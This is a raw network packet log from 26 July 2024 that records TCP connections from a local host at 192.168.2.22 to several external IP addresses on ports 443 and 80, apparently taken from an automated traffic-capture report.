                                              Jul 26, 2024 23:45:21.242458105 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.242515087 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.242579937 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.277826071 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.277890921 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.277968884 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.278034925 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.278079987 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.278079987 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.278110027 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.278332949 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.278386116 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.278398037 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.278414011 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.278446913 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.278466940 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.278740883 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.298142910 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.298213005 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.298280001 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.298342943 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.298382044 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.298409939 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.298461914 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.299091101 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.299148083 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.299170017 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.299191952 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.299231052 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.299231052 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.299231052 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.299231052 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.299779892 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.299834013 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.299854040 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.299868107 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.299899101 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.299922943 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.301836967 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.301891088 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.301908970 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.301920891 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.301950932 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.301968098 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.302423954 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.302478075 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.302493095 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.302505016 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.302541971 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.302542925 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.303142071 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.303201914 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.303216934 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.303227901 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.303257942 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.303275108 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.365098953 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.365236044 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.365628004 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.365709066 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.365761995 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.365828037 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.366235971 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.366305113 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.366360903 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.366422892 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.386269093 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.386358023 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.386394978 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.386455059 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.386832952 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.386904001 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.386959076 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.387020111 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.388977051 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.389050961 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.389065981 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.389121056 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.389373064 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.389431953 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.389436960 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.389462948 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.389492989 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.389492989 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.390209913 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.390285015 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.390317917 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.390373945 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.390506029 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.390569925 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.390597105 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.390644073 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.391091108 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.391155958 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.391180992 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.391233921 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453140020 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453249931 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453270912 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453291893 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453319073 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453336000 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453502893 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453555107 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453592062 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453654051 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.453834057 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.453896046 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.454030991 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.454097986 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.454125881 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.454181910 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.454926014 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.454989910 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.455003977 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.455053091 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.473694086 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.473771095 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.473777056 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.473798037 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.473829031 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.473848104 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.473917961 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.473964930 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.474690914 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.474751949 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.474754095 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.474765062 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.474812031 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.476671934 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.476728916 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.476736069 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.476747990 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.476780891 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.476800919 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477497101 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477554083 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477561951 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477572918 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477616072 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477616072 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477634907 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477684975 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477694035 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477729082 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477734089 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:21.477754116 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.477772951 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.478008032 CEST49168443192.168.2.22104.21.52.88
                                              Jul 26, 2024 23:45:21.478020906 CEST44349168104.21.52.88192.168.2.22
                                              Jul 26, 2024 23:45:24.062685013 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.062761068 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.062827110 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.130434990 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.130507946 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.610395908 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.610471964 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.624692917 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.624718904 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.625612974 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.628084898 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.668544054 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.971131086 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.971409082 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:24.971478939 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.990869999 CEST49169443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:24.990909100 CEST44349169172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.153529882 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.153568983 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.153606892 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.153911114 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.153922081 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.264107943 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:28.272310019 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:28.272376060 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:28.321165085 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:28.325965881 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:28.632390976 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.632476091 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.680473089 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.680546045 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.681579113 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.683728933 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:28.724503040 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:28.967530012 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:29.015403032 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:29.015676975 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:29.015744925 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:29.175510883 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:29.175565004 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:29.225337029 CEST49170443192.168.2.22172.67.197.72
                                              Jul 26, 2024 23:45:29.225384951 CEST44349170172.67.197.72192.168.2.22
                                              Jul 26, 2024 23:45:30.462775946 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:30.467641115 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:30.671293020 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:30.788258076 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:30.788353920 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:30.788424015 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:30.795545101 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:30.795584917 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:30.886786938 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:30.886951923 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:32.183284044 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:32.183365107 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:32.206785917 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:32.206845999 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:32.207318068 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:32.412564039 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:32.412775993 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:33.053769112 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:33.096539974 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:33.922913074 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:33.923146009 CEST44349172188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:33.923202038 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:33.935558081 CEST49172443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.019804955 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:34.024970055 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:34.230139017 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:34.232292891 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.232346058 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.232405901 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.232697964 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.232711077 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.439461946 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:34.439640045 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:34.711932898 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.761430025 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.761490107 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.871000051 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.871216059 CEST44349173188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:34.871391058 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:34.878443003 CEST49173443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:35.158451080 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:35.164382935 CEST8049171132.226.247.73192.168.2.22
                                              Jul 26, 2024 23:45:35.164446115 CEST4917180192.168.2.22132.226.247.73
                                              Jul 26, 2024 23:45:35.204164982 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:35.209104061 CEST8049174193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:35.209163904 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:35.209233046 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:35.214034081 CEST8049174193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:35.669509888 CEST8049174193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:35.730554104 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:35.730643988 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:35.730725050 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:35.731021881 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:35.731059074 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:35.862446070 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:36.202023029 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:36.210728884 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:36.210783005 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:36.335963964 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:36.336215973 CEST44349175188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:36.336280107 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:36.338728905 CEST49175443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:36.617019892 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:36.623720884 CEST8049174193.122.130.0192.168.2.22
                                              Jul 26, 2024 23:45:36.624469995 CEST4917480192.168.2.22193.122.130.0
                                              Jul 26, 2024 23:45:36.632791042 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:36.637640953 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:36.641151905 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:36.649858952 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:36.654649973 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:36.775588036 CEST4917780192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:36.780467033 CEST8049177193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:36.780524015 CEST4917780192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:36.780706882 CEST4917780192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:36.785500050 CEST8049177193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:37.202109098 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:37.415529966 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:37.415595055 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:37.488856077 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:37.493700981 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:37.848849058 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:37.871721983 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:37.871771097 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:37.871967077 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:37.874774933 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:37.874794006 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.046314955 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:38.378443956 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.378520012 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.383169889 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.383193970 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.383569002 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.588583946 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.588687897 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.753609896 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.800502062 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.874138117 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.874377012 CEST44349178188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:38.874439955 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.875458002 CEST49178443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:38.902432919 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:38.908186913 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:39.061602116 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:39.064282894 CEST49179443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:39.064361095 CEST44349179188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:39.064630032 CEST49179443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:39.065753937 CEST49179443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:39.065788031 CEST44349179188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:39.278728962 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:39.412964106 CEST8049177193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:39.432930946 CEST4917780192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:39.439795017 CEST8049177193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:39.591712952 CEST44349179188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:39.594327927 CEST49179443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:39.594356060 CEST44349179188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:39.742614985 CEST44349179188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:39.742716074 CEST44349179188.114.97.3192.168.2.22
                                              Jul 26, 2024 23:45:39.742760897 CEST49179443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:39.743309021 CEST49179443192.168.2.22188.114.97.3
                                              Jul 26, 2024 23:45:39.758214951 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:39.763753891 CEST8049176158.101.44.242192.168.2.22
                                              Jul 26, 2024 23:45:39.763891935 CEST4917680192.168.2.22158.101.44.242
                                              Jul 26, 2024 23:45:39.867193937 CEST4918080192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:39.872045040 CEST8049180193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:39.872112036 CEST4918080192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:39.872224092 CEST4918080192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:39.881340981 CEST8049180193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:40.719506025 CEST8049177193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:40.736346006 CEST49181443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:40.736386061 CEST44349181188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:40.736442089 CEST49181443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:40.743163109 CEST49181443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:40.743176937 CEST44349181188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:40.927472115 CEST8049177193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:40.927536964 CEST4917780192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:41.224433899 CEST44349181188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:41.227108955 CEST49181443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:41.227128029 CEST44349181188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:41.363576889 CEST44349181188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:41.363841057 CEST44349181188.114.96.3192.168.2.22
                                              Jul 26, 2024 23:45:41.363904953 CEST49181443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:41.364214897 CEST49181443192.168.2.22188.114.96.3
                                              Jul 26, 2024 23:45:41.377988100 CEST4917780192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:41.383627892 CEST8049177193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:41.383687973 CEST4917780192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:41.419585943 CEST4918280192.168.2.22193.122.6.168
                                              Jul 26, 2024 23:45:41.424649000 CEST8049182193.122.6.168192.168.2.22
                                              Jul 26, 2024 23:45:41.424709082 CEST4918280192.168.2.22193.122.6.168
